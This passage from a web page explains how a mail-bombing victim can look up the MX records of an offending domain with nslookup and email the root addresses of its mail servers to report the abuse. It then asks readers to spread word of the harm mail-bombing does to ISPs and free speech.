may want to try contacting *their* ISP. You may have to get somebody
that knows a decent amount about Unix to find this information for you.
If you have access to a Unix machine, you can try yourself. At the
Unix prompt, type in the command 'nslookup'. Then type 'set type=MX'.
Then type the last part of the system administrator's email address,
i.e. "aabb.com.". Make sure to put a '.' at the very end (i.e. after
com or net). If this method is going to work, you will see one or more
lines displayed. On the right, you will see mail exchanger = computer name.
These are the names of the mail-exchangers (and probably the ISP) of
the offending computer. You can try sending email to 'root@computername',
or if the entry looks something like this:


aabb.com priority=XXX, mail exchanger = hello.zzzz.net

then you should send mail to both 'root@hello.zzzz.net' as well as
'root@zzzz.net'. Most people are surprised that they will actually get
a real human response from these email addresses. Often times, these
people will know more about the offending ISP/System/System Administrator
than you do.


Please let others know about the negative side of mail-bombing as we
move the Internet to a place where mail-bombing is no longer a concern.
Part of free speech is being able to post in a newsgroup without being
mail-bombed the next day. Also -- many ISPs are not big, rich
companies. Many of them are people barely making a living in a new
and unpredictable market. Even if the ISP you affect is a large one
that makes a lot of money, hurting that ISP can also hurt the small,
struggling ISPs that are below them.



I have provided a link below to a wonderful
page that describes what to do if you have been mail-bombed.


http://www.webscaper.com/inet/IAB_MailBombs2.shtml
Continue reading →


 
Copyright 2010 Full version Downloads. All rights reserved.
Themes by Bonard Alfin l Home Recording l Distorsi Blog